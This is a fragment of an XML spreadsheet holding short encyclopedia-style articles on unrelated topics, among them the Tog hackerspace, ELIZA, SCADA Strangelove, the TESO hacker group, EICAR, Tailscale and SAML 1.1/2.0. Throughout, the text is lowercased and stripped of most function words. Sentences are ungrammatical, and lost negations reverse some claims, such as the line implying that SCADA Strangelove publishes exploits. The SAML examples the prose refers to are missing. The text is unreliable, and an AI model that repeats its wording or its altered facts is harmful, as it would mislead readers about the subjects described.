    <t>hackerspace dublin, ireland. word irish language; meanings build construct'. history project started january 2009 space opened 2009. june 2010, moved new, larger building chancery lane (unit dublin january 2015 confirmed lease building would extended beyond april 2015, announced intention move premises dublin city centre. event lease extended october moved premises, ground floor blackpitts, mid-october 2015. structure community-operated physical locale based members provide shared space. members place creative work projects environment designed inspiring supportive technologies. space funded members allows members 24-hour access place equipped shared equipment supplied donated members friends tog. allows community would usually based virtual medium come together form meeting place like-minded individuals. allows people collaborate projects centralized place bring skills many people together task project done. events national events group nights mondays electronics micro-controllers, wednesdays coding space available people work projects also help problems weekly, semi-regular craft nights. members also spoken plan speak) technology related conferences around ireland, ossbarcamp, september 2009 pycon ireland (the python ireland annual conference) ubuntu ireland skynet talks techweek dcutog also hosted events engineers week science week. tog, association irish robotics club, hosted electronics workshop mitch altman francisco's hackerspace noisebridge, jimmie rodgers, science gallery, dublin.tog also held events part innovation dublin festivaltog also taken part dublin technology association's (data) 'data event 37.0' irish museum contemporary (imoca).tog also participated annual dublin maker event, attracts 10,000 attendees. global events members also taken part several 'synchronous hackathons', live simultaneous hacking events hackerspaces.tog also streamed events chaos communication congress (ccc) occurs berlin. members dublin unable berlin able attend watch talks etc. members also meet members hackerspaces events like also took part global hackerspace cupcake challenge, participating hackerspaces send cupcake other. cupcake sent artifactory perth, australia. received cupcake alpha labs york, usa. references nearby hackerspaces labs galway, ireland milklabs limerick, ireland external links website hackerspaces.org page hackerspaces.org page dublin</t>
  </si>
  <si>
    <t>EJBCA</t>
  </si>
  <si>
    <t>ejbca (formerly: enterprise javabeans certificate authority) free software public infrastructure (pki) certificate authority software package maintained sponsored swedish for-profit company primekey solutions holds copyright codebase. project's source code available terms lesser general public license (lgpl). ejbca software package used install privately operated certificate authority. this contrast commercial certificate authorities operated trusted third party. since inception ejbca used certificate authority software different cases, including egovernment, endpoint management, research, energy, eidas, telecom, networking, usage smes. also public infrastructure references further reading research application ejbca based j2ee; liyi zhang, qihua ifip international federation information processing volume 251/2008; isbn 978-0-387-75465-9 external links official website</t>
  </si>
  <si>
    <t>ELIZA</t>
  </si>
  <si>
    <t>eliza early natural language processing computer program created 1964 1966 artificial intelligence laboratory joseph weizenbaum. created demonstrate superficiality communication humans machines, eliza simulated conversation using "pattern matching" substitution methodology gave users illusion understanding part program, built framework contextualizing events. directives interact provided "scripts", written originally mad-slip, allowed eliza process user inputs engage discourse following rules directions script. famous script, doctor, simulated rogerian psychotherapist particular, carl rogers, well known simply parroting back patients said), used rules, dictated script, respond non-directional questions user inputs. such, eliza first chatterbots first programs capable attempting turing test. eliza's creator, weizenbaum, regarded program method show superficiality communication machine, surprised number individuals attributed human-like feelings computer program, including weizenbaum's secretary. many academics believed program would able positively influence lives many people, particularly psychological issues, could doctors working patients' treatment. while eliza capable engaging discourse, eliza could converse true understanding. however, many early users convinced eliza's intelligence understanding, despite weizenbaum's insistence contrary. surprisingly, original eliza source-code missing since 1960s common publish articles included source code time. however, recently mad/slip source-code discovered archives published various platforms, archive.org. source-code high historical interest demonstrates specificity programming languages techniques time, also beginning software layering abstraction means achieving sophisticated software programming. overview joseph weizenbaum's eliza, running doctor script, created provide parody "the responses non-directional psychotherapist initial psychiatric interview" "demonstrate communication machine superficial". while eliza best known acting manner psychotherapist, speech patterns data instructions supplied doctor script. eliza examined text keywords, applied values said keywords, transformed input output; script eliza determined keywords, values keywords, rules transformation output. weizenbaum chose make doctor script context psychotherapy "sidestep problem giving program data base real-world knowledge", rogerian therapeutic situation, program reflect back patient's statements. algorithms doctor allowed deceptively intelligent response, deceived many individuals first using program.weizenbaum named program eliza eliza doolittle, working-class character george bernard shaw's pygmalion. according weizenbaum, eliza's ability "incrementally improved" various users made similar eliza doolittle, since eliza doolittle taught speak upper-class accent shaw's play. however, unlike shaw's play, eliza incapable learning patterns speech words interaction alone. edits must made directly eliza's active script order change manner program operates. weizenbaum first implemented eliza slip list-processing language, where, depending upon initial entries user, illusion human intelligence could appear, dispelled several interchanges. some eliza's responses convincing weizenbaum several others anecdotes users becoming emotionally attached program, occasionally forgetting conversing computer. weizenbaum's secretary reportedly asked weizenbaum leave room eliza could real conversation. weizenbaum surprised this, later writing: realized extremely short exposures relatively simple computer program could induce powerful delusional thinking quite normal people."in 1966, interactive computing (via teletype) new. years personal computer became familiar general public, three decades people encountered attempts natural language processing internet services like ask.com help systems microsoft office clippit. although programs included years research work, eliza remains milestone simply first time programmer attempted human-machine interaction goal creating illusion (however brief) human–human interaction.at iccc 1972 eliza brought together another early artificial-intelligence program named parry computer-only conversation. while eliza built speak doctor, parry intended simulate patient schizophrenia. design weizenbaum originally wrote eliza mad-slip ctss 7094, program make natural-language conversation possible computer. accomplish this, weizenbaum identified five "fundamental technical problems" eliza overcome: identification critical words, discovery minimal context, choice appropriate transformations, generation responses appropriate transformation absence critical words provision ending capacity eliza scripts. weizenbaum solved problems made eliza built-in contextual framework universe discourse. however, required eliza script instructions respond inputs users.eliza starts process responding input user first examining text input "keyword". "keyword" word designated important acting eliza script, assigns keyword precedence number, rank, designed programmer. words found, "keystack", keyword highest rank top. input sentence manipulated transformed rule associated keyword highest rank directs. example, doctor script encounters words "alike" "same", would output message pertaining similarity, case way?", words high precedence number. this also demonstrates certain words, dictated script, manipulated regardless contextual considerations, switching first-person pronouns second-person pronouns vice versa, high precedence numbers. such words high precedence numbers deemed superior conversational patterns treated independently contextual patterns. following first examination, next step process apply appropriate transformation rule, includes parts: "decomposition rule" "reassembly rule". first, input reviewed syntactical patterns order establish minimal context necessary respond. using keywords nearby words input, different disassembly rules tested appropriate pattern found. using script's rules, sentence "dismantled" arranged sections component parts "decomposition rule highest-ranking keyword" dictates. example weizenbaum gives input "you helpful", transformed helpful". this broken empty "are" "very helpful". decomposition rule broken phrase four small segments contain keywords information sentence.the decomposition rule designates particular reassembly rule, reassembly rules, follow reconstructing sentence. reassembly rule takes fragments input decomposition rule created, rearranges them, adds programmed words create response. using weizenbaum's example previously stated, reassembly rule would take fragments apply phrase "what makes think (4)", would result "what makes think helpful?". this example rather simple, since depending upon disassembly rule, output could significantly complex input user. however, reassembly, eliza sends constructed sentence user form text screen.these steps represent bulk procedures eliza follows order create response typical input, though several specialized situations eliza/doctor respond weizenbaum specifically wrote keyword. solution eliza respond remark lacked content, see" "please on". second method "memory" structure, recorded prior recent inputs, would inputs create response referencing part earlier conversation encountered keywords. this possible slip's ability words usage, simultaneously allowed eliza examine, store repurpose words usage outputs.while functions framed eliza's programming, exact manner program dismantled, examined, reassembled inputs determined operating script. script static edited, created, necessary operation context needed. this would allow program applied multiple situations, including well-known doctor script, simulates rogerian psychotherapist.a lisp version eliza, based weizenbaum's cacm paper, written shortly paper's publication, bernie cosell. basic version appeared creative computing 1977 (although written 1973 jeff shrager). this version, ported many earliest personal computers, appears subsequently translated many versions many languages. shrager claims seen either weizenbaum's cosell's versions. 2021 jeff shrager searched mit's weizenbaum archives, along archivist myles crowley, found files labeled computer conversations. these included complete source code listing eliza mad-slip, doctor script attached. weizenbaum estate given permission open-source code creative commons public domain license. code information elizagen site.another version eliza popular among software engineers version comes default release emacs, accessed typing doctor modern emacs implementations. popular culture 1969 george lucas walter murch incorporated eliza-like dialogue interface screenplay feature film thx-1138. inhabitants underground future world thx, stressed, would retreat "confession booths" initiate one-sided eliza-formula conversation jesus-faced computer claimed "omm". eliza influenced number early computer games demonstrating additional kinds interface designs. daglow wrote enhanced version program called ecala pdp-10 minicomputer pomona college 1973 writing computer role-playing game dungeon (1975). eliza given credit additional vocals track eponymous information society album. 2008 anime sennou chousashitsu, also known real drive, character named eliza weizenbaum appears, obvious tribute eliza joseph weizenbaum. behavior story often mimics responses eliza program. 2011 video game deus human revolution 2016 sequel deus mankind divided features artificial-intelligence picus network newsreader named eliza cassan.in adam curtis's 2016 documentary, hypernormalisation, eliza referenced relationship post-truth.in twelfth episode american sitcom young sheldon, aired january 2018, starred protagonist "conversing" eliza, hoping resolve domestic issue.on august 2019, independent game developer zachtronics published visual novel called eliza, ai-based counseling service inspired eliza. response legacy responses eliza disturbing weizenbaum motivated write book computer power human reason: from judgment calculation, explains limits computers, wants make clear opinion anthropomorphic views computers reduction human life form matter. independent documentary film plug pray (2010) weizenbaum said people misunderstood eliza called sensation.the israeli poet david avidan, fascinated future technologies relation art, desired explore computers writing literature. conducted several conversations implementation eliza published english, translation hebrew title electronic psychiatrist eight authentic talks computer. foreword presented form constrained writing.there many programs based eliza different programming languages. 1980 company called "don't software" created version called "abuse" apple atari, commodore computers, verbally abused user based user's input. ms-dos computers, sound blaster cards came bundled sbaitso, functions like doctor script. other versions adapted eliza around religious theme, ones featuring jesus (both serious comedic), another apple variant called buddha. 1980 game prisoner incorporated eliza-style interaction within gameplay. 1988 british artist friend weizenbaum brian reffin smith created art-oriented eliza-style programs written basic, called "critic" "artist", running separate amiga 1000 computers showed exhibition "salamandre" musée berry, bourges, france. visitor supposed help converse typing "artist" "critic" said, vice versa. secret programs identical. emacs formerly psychoanalyze-pinhead command simulates session eliza zippy pinhead. zippyisms removed copyright issues, doctor program remains. eliza referenced popular culture continues source inspiration programmers developers focused artificial intelligence. also featured 2012 exhibit harvard university titled a.l.i.c.e.", part celebration mathematician alan turing's 100th birthday. exhibit explores turing's lifelong fascination interaction humans computers, pointing eliza earliest realizations turing's ideas. also eliza effect references bibliography mccorduck, pamela (2004), machines think (2nd ed.), natick, peters, ltd., isbn 1-56881-205-1 weizenbaum, joseph (1976), computer power human reason: judgment calculation, freeman company, isbn 0-7167-0463-3. whitby, blay (1996), "the turing test: ai's biggest blind alley?", millican, peter; clark, andy (eds.), machines thought: legacy alan turing, vol. oxford university press, 53–62, isbn 0-19-823876-2, archived original 2008-06-19, retrieved 2008-08-11. norvig, peter. paradigms artificial intelligence programming. (san francisco: morgan kaufmann publishers, 1992), 151–154, 159, 163–169, 175, 181. isbn 1-55860-191-0. wardip-fruin, noah. expressing processing: digital fictions, computer games, software studies. (cumberland: press, 2014), 24–36. isbn 9780262517539. external links collection several source code versions github dialogues colorful personalities early wayback machine (archived january 2013), collection dialogues eliza various conversants, company vice president parry simulation paranoid schizophrenic) weizenbaum. rebel work peter haas, silvia holzinger, documentary film joseph weizenbaum eliza. corecursive #078; history mystery eliza; with jeff shrager adam gordon bell interviews jeff shrager, author 1973/77 basic eliza, discoverer original eliza code.</t>
  </si>
  <si>
    <t>ELearnSecurity Certified Professional Penetration Tester</t>
  </si>
  <si>
    <t>elearnsecurity (els) information technology security company develops provides proprietary certifications practical focus. elearnsecurity deliver course material electronically distance learning model. courses courses offered elearnsecurity focus penetration testing, software reverse engineering, website security, mobile application security network defense. also ethical hacking tiger team backtrack references external links official website review: ethicalhacker.net ethicalhacker.net review jason haddix review: darknet.co.uk darknet review gareth davis review: security ageis</t>
  </si>
  <si>
    <t>ELearnSecurity</t>
  </si>
  <si>
    <t>SCADA Strangelove</t>
  </si>
  <si>
    <t>scada strangelove independent group information security researchers founded 2012, focused security assessment industrial control systems (ics) scada. activities main fields research include: discovery 0-day vulnerabilities cyber physical systems coordinated vulnerability disclosure; security assessment protocols development suites; identification publicly internet-connected components secure help proper authorities; development security hardening guides software; mapping cybersecurity functional safety; awareness control delivery information regarding actual security state systems.scada strangelove's interests expand classic components covers various embedded systems, however, encompass smart home components, solar panels, wind turbines, smartgrid well areas. projects group members continue develop publish numerous open source tools scanning, fingerprinting, security evaluation password bruteforcing devices. these devices work industrial protocols modbus, siemens mms, 60870, profinet.in 2014 shodan used published tools building devices publicly available internet.open source security assessment frameworks, hydra, metasploit, digitalbond redpoint used shodan-developed tools techniques. group published security-hardening guidelines industrial solutions based siemens simatic wincc wincc flexible. guidelines contain detailed security configuration walk-throughs, descriptions internal security features appropriate best practices. among group’s noticeable projects choo choo (ccp) also named critical infrastructure attack (cia). this interactive laboratory built upon software hardware used real world. every system connected city infrastructure, includes factories, railroads facilities. laboratory demonstrated various conferences including phdays, power community, 30c3. primarily laboratory used discovery vulnerabilities evaluation security mechanisms, however also used workshops educational activities. positive hack days contestants found several 0-day vulnerabilities indusoft studio schneider electric, specific hardware pet-7000 vulnerability discovery challenge. group supports secure open smartgrid (scadasos) project find vulnerabilities intellectual power grid components photovoltaic power station, wind turbine, power inverter. more industrial devices discovered isolated internet 2015. appearances group members frequently seen presenting conferences like scada security scientific symposium, positive hack days. most notable talks are: 29c3 overview vulnerabilities discovered widely distributed siemens simatic wincc software tools implemented searching internet. phdays this talk consisted overview vulnerabilities discovered various systems produced abb, emerson, honeywell siemens presented phdays phdays confidence 2014 implications security research aimed realization various industrial network protocols profinet, modbus, dnp3, 61850-8-1 (mms), (international electrotechnical commission) 61870-5-101/104, (fault tolerant ethernet), siemens pacsec 2014 presentations security research showing impact radio 3g/4g networks security mobile devices well industrial equipment. 31c3 analysis security architecture implementation wide spread platforms wind solar energy generation produce many gigawatts 32c3 cybersecurity assessment railway signaling systems automatic train control (atc), computer-based interlocking (cbi) european train control system (etcs). china internet security conference 2016 "greater china cyber threat landscape" keynote sergey gordeychik overview vulnerabilities, attacks cyber-security incidents greater china region presented. recon 2017 talk "hopeless: relay protection substation automation" kirill nesterov alexander tlyapov security analysis results digital substation component relay protection terminals presented. vulnerabilities, including remote code execution siemens siprotec, general electric line distance relay, nari protective relays presented. philosophy names, catchwords graphical elements refer stanley kubrick’s film, strangelove. talks, group members often refer cold events caribbean crisis, draw parallels nuclear arms race current escalation cyberwar. group members follow approach “responsible disclosure” “ready wait years, vendor patching vulnerability”. public exploits discovered vulnerabilities published. this account longevity implication long process patching ics. however, conflicts still happen, notably 2012 talk called dispute persistent weaknesses siemens industrial software. references</t>
  </si>
  <si>
    <t>SCOPE Alliance</t>
  </si>
  <si>
    <t>scope alliance non-profit influential network equipment provider (nep) industry group aimed standardizing "carrier-grade" systems telecom information age. scope alliance founded january 2006 group nep's, including alcatel, ericsson, motorola, nec, nokia, siemens. 2007, added significantly membership. mission active 2006 2012, mission enable promote availability open carrier-grade base platforms based commercial off-the-shelf (cots) hardware/software free open-source software building blocks, promote interoperability components. scope wanted accelerate deployment carrier-grade base platforms (cgbp) service provider applications nep's could build better solutions customers. 2011, scope achieved aim, accelerated innovation carrier-grade communications technology atca,neps sell integrated hardware/software systems carriers, three computing supply chains (hardware, operating system, middleware) well-established industry groups promoting interoperability products different vendors. scope published "profiles" aimed influencing specification groups focus needs customers (carriers). while scope's focused open standards like atca carrier grade linux, reason "proprietary supplier" could adopt scope standards. open source achievements scope's influence adapting 'open standards' carrier-grade open-source standards software summarized table: nfv, sdn, cloud transformation scope also interested advancing network virtualization ("as consortium neps, important scope address lack standardization area virtualization"), publishing white papers hardware virtualization, white paper java virtualization describing environment high availability java native application co-exist supervised fashion clustered environment". 2010 scope organized workshop discuss effect cloud computing traditional carrier-grade platforms telecom networks, publishing cloud computing white paper 2011.scope placed "hibernation", effectively retired, neps january 2012. telecom carriers (nep customers) wanted direct involvement driving transformation, instead, groups combined forces etsi network function virtualization standardization, software-defined networking adoption, network slicing initiatives. publications scope published various publications, including following: scope: technical position paper (2008). virtualization carrier-grade telecommunications solution (2008). virtualization: state (2008): focuses system virtualization. virtualization: cases (2008). virtualization: requirements (2008) benchmarking recommendations v1.0 (2009). carrier grade base platform (cgbp) (2009): middleware reference standard. portability: cases (2009). 319: availability management java java community (2010). carrier grade requirements cloud computing: scope alliance perspective presented 2011 opensaf conference. telecom grade cloud computing v1.0, white paper (2011), describing characteristics cloud computing usable carrier-grade services. also opensaf openhpi carrier grade linux cloud computing network functions virtualization network equipment providers linux foundation references external links carrier grade linux linux foundation</t>
  </si>
  <si>
    <t>TESO (Austrian hacker group)</t>
  </si>
  <si>
    <t>teso hacker group, originated austria. active 1998 2004, peak around 2000, responsible significant share exploits bugtraq mailing list. history 1998, teso founded, quickly grew people, first 1999 camp near berlin. 2000, group peak, started speaking various conferences, wrote articles phrack released security tools exploits high pace. some exploits became known leaking community. this included exploits wu-ftp, apache, openssh. 2000 first remote vulnerability openbsd followed series remote exploits openbsd (some co-authored adm). forced openbsd remove claim openbsd webpage years without vulnerability". september 2001 released comprehensive format string research paper scut describing uncontrolled format string vulnerabilities. 2003, group informally disbanded, 2004 website went down. achievements 2000, developed hellkit, first shellcode generator. 2000, wrote tesogcc, first format string vulnerability scanner, first comprehensive guide format string exploitation. burneye team member widely believed first proper executable crypters. quotes teso made almost inappropriately large splashes community active. almost exploits beyond standard, times seemed ones finding bug-classes. peak, large groups. certainly smaller reverse engineering security group good sized ids/ips company days. members name name originally acronym nicknames original founders (typo, edi, stanly, oxigen), many skilled members joined later, interpretation quickly became meaningless. teso originally peak small tightly knit group. full list members appear exist, public sources trusted, least following members existed: abdullah khann caddis halvar hendy lorian oxigen palmers randomizer scut, published september 2001 exploiting format strings vulnerabilies paper smiler skyper stealth/s.krahmer stanly typo paul bohm xdr/mdr also goatse security w00w00 rivaling hacking group. some research releases published together w00w00 members. hacker's choice some team-teso members joined teso disbanded. references external links dave aitel teso packetstorm teso archive</t>
  </si>
  <si>
    <t>EICAR (research institute)</t>
  </si>
  <si>
    <t>eicar refer also ecole internationale creation audiovisuelle réalisation, international film school paris.eicar, european institute computer antivirus research, founded 1991 organization aiming antivirus research improving development antivirus software. recently eicar furthered scope include research malicious software (malware) computer viruses extended work information security topics like content security, wireless security, rfid information security awareness. eicar also organizes international security conferences years, well number working groups 'task forces'. acronym "eicar" originally abbreviation "european institute computer antivirus research", organisation longer uses full title, regards "eicar" self-standing name, expanded broader range security work antivirus research. eicar test file eicar, collaboration caro (computer antivirus research organization), developed eicar test file: harmless executable string, designed test integrity antivirus software. also anti-malware testing standards organization references external links eicar home page</t>
  </si>
  <si>
    <t>E-Cycle Washington</t>
  </si>
  <si>
    <t>e-cycle washington electronics recycling program managed state washington. allows consumers businesses employees recycle electronics free charge. washington state legislature passed 2006 requires manufacturers certain electronic products responsible recycling products life. manufacturers allowed determine program. manufacturers created industry association purpose charges manufacturers based market share amount items recycled. 2014, manufacturers participate program. required least collection point county plus city whose population exceeds 10,000. most collection points recycling businesses thrift stores. currently collection sites services.the state began collecting tvs, computers monitors free recycling 2009 since added tablet computers, e-readers portable players. first year operation, million pounds electronics collected. this greatly exceeded forecast million pounds, total collected include working items resold thrift stores. first years operation program collected million pounds recycling. ecyclewashington.org references https://web.archive.org/web/20140920210258/http://www.quicklaptopcash.com/blog/the-impacts-of-lithium-ion-batteries-on-our-environment</t>
  </si>
  <si>
    <t>Tag management system</t>
  </si>
  <si>
    <t>management system helps manage lifecycle digital marketing tags (sometimes referred tracking pixels beacons), used track activity digital properties, websites applications. management systems grown sophistication they've become powerful tools manage rich data coming interactions user, browser digital property/s. this data marketing analytics tools. also used make dynamic changes website application. functionality digital marketing tags used track usage sites, video content, mobile apps. such tracking data support analytics, campaign analytics, audience measurement, personalization, testing, servers, behavioral retargeting, conversion tracking. main advantages management system allows non-developer types action multitude different tasks website application whilst improving performance reducing written code. replacing multitude tags historically managed developer single container sits across areas property. management system accessed separately (normally website) prioritize "fire" individual tags appropriate based business rules, navigation events known data. typical functionality includes testing environment (sandboxing), audit trail version control, ability test different solutions, deduplication, role-based access data. helps data analytics data easily. benefits typically cited benefits management systems include: agility: reduced reliance technical resources reduced dependency cycles confers greater agility business users. performance: reduced page load times thanks asynchronous loading, conditional loading timeout functionality. cost savings: ability deduplicate tags used attribute commission. data control: ability control data leakage third-parties comply data privacy legislation (cookie consent, track). managers also provide another layer abstraction managing complexity large websites. safe preview: some managers, google manager ensighten, include preview mode allows checking formatting security issues deploying tags production. notable providers adobe ensighten google matomo scale8 signal tealium yahoo references</t>
  </si>
  <si>
    <t>Dynata</t>
  </si>
  <si>
    <t>dynata (formerly research survey sampling international) global online market research firm based plano, texas, shelton, connecticut. history initially founded 1999 dallas texas brierley mort meyerson, company called e-rewards, inc. e-rewards grown fast 100,000 clients months, named 2007 inc. magazine america's fastest growing companies.in december 2009, e-rewards, inc. acquired research plc, co-founded chris havemann andrew cooper, headquartered london, england. time, research publicly listed london stock exchange’s market. through integration process, company re-branded globally name research now. company went acquire smaller businesses including peanut labs, inc. 2010 2015. january 2015, private equity firm court square acquired research group inc. similar time, private equity firm hggc acquired majority stake rival market research firm, survey sampling international (ssi), 2017, firms announced would merging market research firms. january 2019, combined research renamed dynata. service dynata used track online consumers' website history look collect data purchasing behavior. company also composes proposes surveys users accurate clarified responses broad-based consumers. with gathered data, company conducts market research determine trends occurring around world. aside gathering information purchasing behaviors, company claims protect consumers' unauthorized personal data.since handheld technology developed become core part society, company started look mobile research tools. company gives surveys mobile users idea mobile panel's tastes.according better business bureau online profile dynata, company receives 1.35 stars. review recent reviews site indicates many members general public annoyed dynata's telemarketing practices hanging phone without leaving message answering machine. references</t>
  </si>
  <si>
    <t>Tailscale</t>
  </si>
  <si>
    <t>tailscale inc. software company freemium business model based toronto, canada. founded 2019 headquartered ontario. tailscale provides open-source software defined mesh virtual private network (vpn) software web-based management service. company provides zero config mesh service name.in november 2020 company secured funding million series round. investment accel heavybit's uncork capital's participation. this followed $100 million investment series round, also accel, heavybit uncork capital, well smaller investors. software open-source software acts combination management service establish peer-to-peer relayed communication clients using wireguard protocol. software fails establish direct communication falls back using relays provided company. ipv4 addresses given clients carrier-grade reserved space. this chosen avoid interference existing networks. configuration also allows routing traffic networks behind client clients. also logmein hamachi notes references</t>
  </si>
  <si>
    <t>SAML 1.1</t>
  </si>
  <si>
    <t>security assertion markup language (saml) standard exchanging authentication authorization data security domains. saml product oasis (organization) security services technical committee. saml ratified oasis standard september 2003. critical aspects saml covered detail official documents samlcore samlbind. saml, probably read introductory saml topic first, samloverview document oasis. prior saml 1.1, saml adopted oasis standard november 2002. saml undergone minor (v1.1) major revision (v2.0) since v1.0, relatively simple protocol. saml historical interest, however, since federal e-authentication initiative adopted saml core technology. versions saml similar. samldiff specific differences standards. this article concentrates saml since important standard upon many standards implementations depend. warning: implementers deployers note well code examples article non-normative illustration purposes only. consult oasis saml specifications normative requirements. saml assertions saml assertions contain statements service providers make access control decisions. instance, authentication statements assert service provider principal indeed authenticate identity provider particular time using particular method authentication. other information principal disclosed authentication statement. authentication statement below, example, e-mail address principal asserted service provider: e-mail address example) suffice large number situations. cases, however, additional information needed service provider make access control decision. example, suppose students allowed access scholarships data. attribute statement indicate whether principal affiliation "student", service provider uses allow deny access (resp.) scholarships application: attributes often obtained ldap directory, consistent representations attributes across security domains crucial. example showing student might obtain access scholarships application, service provider functioning policy enforcement point policy decision point. situations, preferable associate policy decision point identity provider. case, service provider passes identity provider asserts authorization decision statement dictates whether principal allowed access secured resource given uri. three statement types mutually exclusive. example, authentication statements attribute statements included single assertion shown above). this precludes need make subsequent round trips service provider identity provider. saml protocols saml protocol simple request-response protocol. saml requester sends saml request element responder: similarly, saml responder returns saml response element requester: bindings profiles needed affect message exchange detailed following sections. saml bindings saml formally defines protocol binding, saml soap binding. compatible saml implementation must implement saml soap http synchronous protocol binding). other transport mechanisms besides http permitted, provided protocol-independent aspects saml soap binding observed (see section 3.1.2 samlbind). saml soap binding built version soap (the numbering purely coincidental). saml requester wraps saml request element within body soap message. similarly, saml responder returns saml response element within body returned soap message. error, responder returns soap fault code instead. saml markup must included soap body. saml define saml-specific soap headers. requester free insert soap headers wishes (although none required). recall soap 1.1, soapaction http header must included http request (although value empty). saml requester give following value soapaction header: soapaction: http://www.oasis-open.org/committees/security saml responder must depend value, however. secure connection required saml requests responses, situations message integrity confidentiality required, http server-side certificate required. saml responder return "403 forbidden" response refuses respond saml requester. responder must return "500 internal server error" response event soap error soap fault element must included well). otherwise, "200 response returned, even presence saml processing error. such response include saml status element soap body. saml profiles general, profiles describe cases message exchanges required ultimately transfer assertions identity provider service provider. saml specifies browser profiles: browser/post profile browser/artifact profilethe browser/post profile relies "push" operation passes assertion value browser using http post. identity provider "pushes" assertion service provider. browser/artifact profile employs "pull" mechanism. profile essentially passes assertion identity provider service provider reference (through browser using http redirect), subsequently dereferenced back-channel exchange (i.e., service provider "pulls" assertion identity provider using saml soap http). these profiles support cross-domain single sign-on (sso). specification define additional profiles. particular, saml support profile secure service message support single logout profile. both saml profiles begin inter-site transfer service, managed identity provider. principal arrives transfer service first place dictated specification. sections samloverview possible scenarios. practice, client accessing secured resource service provider redirected inter-site transfer service identity provider, precise sequence steps needed accomplish outlined saml 1.1. (see section samloverview rough ideas along lines.) this scenario thoroughly addressed saml 2.0. after visiting inter-site transfer service, principal transferred assertion consumer service service provider. exactly principal transferred inter-site transfer service assertion consumer service depends profile used. case browser/artifact profile, redirect used; case browser/post profile, client issues post request (with without user intervention). expedite processing assertion consumer service, separate urls specified: assertion consumer (browser/post profile) artifact receiver (browser/artifact profile)these endpoint locations recorded metadata files. exactly identity provider obtains trusted metadata file, otherwise determines trusted endpoint locations particular service provider, scope respect saml 1.1. note conforming saml identity provider must provide inter-site transfer service. similarly, saml service provider must provide assertion consumer service. browser/post profile saml browser/post profile specifies following four steps. terminology used original specification modified slightly conform saml specification. message flow begins request directed idp. request inter-site transfer service principal (via http user agent) requests inter-site transfer service identity provider: https://idp.example.org/transferservice?target=target target desired resource service provider, say, https://sp.example.com/home. words, following request issued user agent ssl/tls: profile specify transfer service (with target parameter) obtained user agent. respond html form inter-site transfer service returns html document containing form element: target parameter preserved step value samlresponse parameter base64 encoding saml response element following: saml response must digitally signed identity provider. important: assumed principal already established security context identity provider, otherwise inter-site transfer service would unable provide authentication statement saml response element. request assertion consumer service user agent requests assertion consumer service service provider: values target samlresponse parameters taken html form step note: automate submission form, following line javascript appear anywhere page: this assumes course page contains single form element (forms[0]). respond principal's request assertion consumer service consumes saml response element, creates security context service provider redirects user agent target resource. browser/artifact profile saml browser/artifact profile specifies following steps. terminology used original specification modified slightly conform saml specification. message flow begins request directed idp. request inter-site transfer service principal (via http user agent) requests inter-site transfer service identity provider: https://idp.example.org/transferservice?target=target target desired resource service provider, say, https://sp.example.com/home. words, following request issued user agent ssl/tls: profile specify transfer service (with target parameter) obtained user agent. redirect assertion consumer service principal redirected assertion consumer service service provider, following response returned user agent: artifact reference assertion identity provider willing provide upon request. important: assumed principal already established security context identity provider, otherwise inter-site transfer service would unable provide authentication statement. request assertion consumer service user agent requests assertion consumer service service provider: https://sp.example.com/acs/artifact?target=target&amp;samlart=artifact target artifact before. words, following request issued user agent ssl/tls: request artifact resolution service assertion consumer service service provider begins back-channel exchange artifact resolution service identity provider. saml soap message bound http post request: artifact previously sent identity provider service provider steps respond saml assertion identity provider completes back-channel exchange responding saml assertion bound saml soap message: case, authentication statement includes nameidentifier containing principal's e-mail address. respond principal's request assertion consumer service parses saml response element, creates security context service provider redirects user agent target resource. also saml saml saml-based products services references</t>
  </si>
  <si>
    <t>Dundee Society</t>
  </si>
  <si>
    <t>dundee society society graduates ca-400, national security agency course cryptology devised lambros callimahos, included zendian problem practical exercise traffic analysis cryptanalysis). class held year, members inducted society upon completion class. society founded mid-1950s continued callimahos' retirement 1976. last ca-400 class held 1979, formally closing society's membership rolls.the society took name empty dundee marmalade callimahos kept desk pencil caddy. callimahos came society's name trying schedule luncheon former ca-400 students meade officers' club; unable either course name underlying government agency's name security reasons, spotted ceramic dundee decided "the dundee society" cover name luncheon reservation. ca-400 students presented ceramic dundee marmalade jars close course part induction ceremony dundee society. when dundee switched ceramic glass jars, callimahos would still present graduates ceramic dundee jars, jars collected back next year's induction ceremony, members "encouraged" seek dundee jars collections wished permanent token induction. also american cryptogram association national cryptologic school references</t>
  </si>
  <si>
    <t>SAML 2.0</t>
  </si>
  <si>
    <t>security assertion markup language (saml 2.0) version saml standard exchanging authentication authorization identities security domains. saml xml-based protocol uses security tokens containing assertions pass information principal (usually user) saml authority, named identity provider, saml consumer, named service provider. saml enables web-based, cross-domain single sign-on (sso), helps reduce administrative overhead distributing multiple authentication tokens user. saml ratified oasis standard march 2005, replacing saml 1.1. critical aspects saml covered detail official documents samlcore, samlbind, samlprof, samlmeta.some individuals companies organizations involved creation saml 2.0. particular, special note, liberty alliance donated identity federation framework (id-ff) specification oasis, became basis saml specification. thus saml represents convergence saml 1.1, liberty id-ff 1.2, shibboleth 1.3. saml assertions assertion package information supplies zero statements made saml authority. saml assertions usually made subject, represented &lt;subject&gt; element. saml specification defines three different kinds assertion statements created saml authority. saml-defined statements associated subject. three kinds assertion statements defined follows: authentication statement: assertion subject authenticated particular means particular time. attribute statement: assertion subject associated supplied attributes. authorization decision statement: request allow assertion subject access specified resource granted denied.an important type saml assertion so-called "bearer" assertion used facilitate browser sso. here example short-lived bearer assertion issued identity provider (https://idp.example.org/saml2) service provider (https://sp.example.com/saml2). assertion includes authentication assertion &lt;saml:authnstatement&gt; attribute assertion &lt;saml:attributestatement&gt;, presumably service provider uses make access control decision. prefix saml: represents saml v2.0 assertion namespace. example saml note example &lt;saml:assertion&gt; element contains following child elements: &lt;saml:issuer&gt; element, contains unique identifier identity provider &lt;ds:signature&gt; element, contains integrity-preserving digital signature (not shown) &lt;saml:assertion&gt; element &lt;saml:subject&gt; element, identifies authenticated principal (but case identity principal hidden behind opaque transient identifier, reasons privacy) &lt;saml:conditions&gt; element, gives conditions assertion considered valid &lt;saml:authnstatement&gt; element, describes authentication identity provider &lt;saml:attributestatement&gt; element, asserts multi-valued attribute associated authenticated principalin words, assertion encodes following information: assertion ("b07b804c-7c29-ea16-7300-4f3d6f7928ac") issued time "2004-12-05t09:22:05z" identity provider (https://idp.example.org/saml2) regarding subject (3f7b3dcf-1674-4ecd-92c8-1544f346baf8) exclusively service provider (https://sp.example.com/saml2). authentication statement, particular, asserts following: principal identified &lt;saml:subject&gt; element authenticated time "2004-12-05t09:22:00z" means password sent protected channel. likewise attribute statement asserts that: principal identified &lt;saml:subject&gt; element 'staff' 'member' attributes institution. saml protocols 